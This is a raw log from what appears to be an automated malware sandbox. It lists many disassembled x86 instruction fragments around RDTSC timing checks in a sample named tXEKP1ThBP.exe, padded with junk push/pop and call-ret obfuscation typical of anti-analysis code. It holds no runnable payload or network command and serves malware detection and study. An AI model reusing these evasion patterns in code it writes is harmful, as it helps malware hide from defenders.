Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9CF367 second address: 9CF36B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9D0115 second address: 9D0139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jmp 00007F77012B90F8h 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9CF36B second address: 9CF401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 add ebx, 71F8E1C9h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F77004F22B8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f movsx edi, bx 0x00000032 sub edi, 657341F7h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov dword ptr [ebp+122D32EBh], eax 0x00000045 mov eax, dword ptr [ebp+122D0169h] 0x0000004b push 00000000h 0x0000004d push ebp 0x0000004e call 00007F77004F22B8h 0x00000053 pop ebp 0x00000054 mov dword ptr [esp+04h], ebp 0x00000058 add dword ptr [esp+04h], 0000001Ah 0x00000060 inc ebp 0x00000061 push ebp 0x00000062 ret 0x00000063 pop ebp 0x00000064 ret 0x00000065 jp 00007F77004F22B9h 0x0000006b mov dword ptr [ebp+122D278Eh], edx 0x00000071 push FFFFFFFFh 0x00000073 ja 00007F77004F22BCh 0x00000079 push eax 0x0000007a pushad 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9CF401 second address: 9CF405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9D226E second address: 9D22BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F77004F22B8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 jnl 00007F77004F22B9h 0x00000029 add dword ptr [ebp+1244245Bh], ecx 0x0000002f push 00000000h 0x00000031 jo 00007F77004F22BCh 0x00000037 mov edi, dword ptr [ebp+122D1C2Ah] 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9D22BB second address: 9D22BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9D146D second address: 9D1471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9D4276 second address: 9D4280 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F77012B90E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9D340E second address: 9D3412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9D4280 second address: 9D42E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+122D3203h] 0x00000013 mov ebx, 592789A1h 0x00000018 push 00000000h 0x0000001a sub dword ptr [ebp+1243F1BFh], ebx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F77012B90E8h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c push esi 0x0000003d mov dword ptr [ebp+122D2779h], edx 0x00000043 pop edi 0x00000044 or dword ptr [ebp+1244896Fh], edx 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F77012B90F4h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9D3412 second address: 9D342F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9D42E3 second address: 9D4302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d ja 00007F77012B90E6h 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9D4302 second address: 9D4307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9D4307 second address: 9D430D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9D52D4 second address: 9D52D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9DCFE2 second address: 9DCFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E1F40 second address: 9E1F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E1F44 second address: 9E1F4D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E175A second address: 9E175E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E175E second address: 9E176A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E176A second address: 9E176E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E18CD second address: 9E18D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E18D6 second address: 9E18DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E18DA second address: 9E18F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E18F1 second address: 9E190B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C5h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E1A8C second address: 9E1A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E1A92 second address: 9E1A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E5419 second address: 9E541E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 97695C second address: 976982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F77004F22C0h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F77004F22BFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 976982 second address: 97699C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F77012B90E6h 0x00000008 jns 00007F77012B90E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007F77012B90E6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 97699C second address: 9769D6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F77004F22B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F77004F22D0h 0x00000013 jmp 00007F77004F22BDh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9769D6 second address: 9769DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9769DC second address: 9769E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9769E0 second address: 9769E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9769E4 second address: 9769F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F77004F22B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E9BC8 second address: 9E9BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9E9BD0 second address: 9E9BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F77004F22CFh 0x0000000b jo 00007F77004F22B6h 0x00000011 jmp 00007F77004F22C3h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9EB6D4 second address: 9EB6F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77012B90F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9EB807 second address: 9EB80B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9EF46C second address: 9EF476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F77012B90E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9EFA77 second address: 9EFA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77004F22C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9EFEE5 second address: 9EFEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9EFEE9 second address: 9EFEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9EFEED second address: 9EFEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F007C second address: 9F0082 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F0082 second address: 9F009B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F77012B90ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jc 00007F77012B90ECh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F0235 second address: 9F0249 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BAh 0x00000007 jp 00007F77004F22B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F0249 second address: 9F0251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F0251 second address: 9F0255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F0255 second address: 9F0259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F0259 second address: 9F026E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F0408 second address: 9F041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77012B90F1h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F06C2 second address: 9F06CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F06CC second address: 9F06D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F06D0 second address: 9F06D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F06D6 second address: 9F06DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F06DC second address: 9F06FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007F77004F22B6h 0x00000009 pop ebx 0x0000000a jmp 00007F77004F22BDh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F06FB second address: 9F0705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F77012B90E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F0705 second address: 9F0723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C4h 0x00000007 js 00007F77004F22B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F0723 second address: 9F072C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BB35C second address: 9BB395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 xor dword ptr [ebp+122D1884h], eax 0x0000000d lea eax, dword ptr [ebp+124720CAh] 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F77004F22B8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d nop 0x0000002e pushad 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BB395 second address: 9A15FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b popad 0x0000000c push eax 0x0000000d jo 00007F77012B90F7h 0x00000013 jmp 00007F77012B90F1h 0x00000018 nop 0x00000019 mov ecx, dword ptr [ebp+122D2C0Ch] 0x0000001f call dword ptr [ebp+122D3765h] 0x00000025 pushad 0x00000026 push ebx 0x00000027 push esi 0x00000028 pop esi 0x00000029 pop ebx 0x0000002a jmp 00007F77012B90F1h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BB600 second address: 9BB606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BB606 second address: 9BB60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BB60A second address: 9BB60E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BBB00 second address: 9BBB0A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BBB0A second address: 9BBB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BBB0E second address: 9BBB12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BBC54 second address: 9BBC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 ja 00007F77004F22BCh 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BBFC8 second address: 9BBFDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77012B90EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BC2C7 second address: 9BC2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F77004F22B6h 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov ecx, ebx 0x00000013 push 0000001Eh 0x00000015 mov dx, ax 0x00000018 nop 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BC63B second address: 9BC63F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BC63F second address: 9BC645 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BC645 second address: 9BC66B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F77012B90E8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D2393h], ebx 0x00000015 lea eax, dword ptr [ebp+1247210Eh] 0x0000001b push edx 0x0000001c movsx ecx, di 0x0000001f pop edi 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BC66B second address: 9BC686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77004F22C6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BC686 second address: 9BC68C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F4318 second address: 9F431C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F4793 second address: 9F479B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F479B second address: 9F47DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F77004F22BEh 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 js 00007F77004F22B6h 0x00000018 push eax 0x00000019 pop eax 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d js 00007F77004F22CEh 0x00000023 jmp 00007F77004F22C8h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9F4993 second address: 9F4999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9FF969 second address: 9FF96F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9FF96F second address: 9FF97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007F77012B90E6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9FF97F second address: 9FF987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9FFEFA second address: 9FFF0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 jnc 00007F77012B90F8h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9FFF0B second address: 9FFF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A001C7 second address: A001CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0049D second address: A004A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
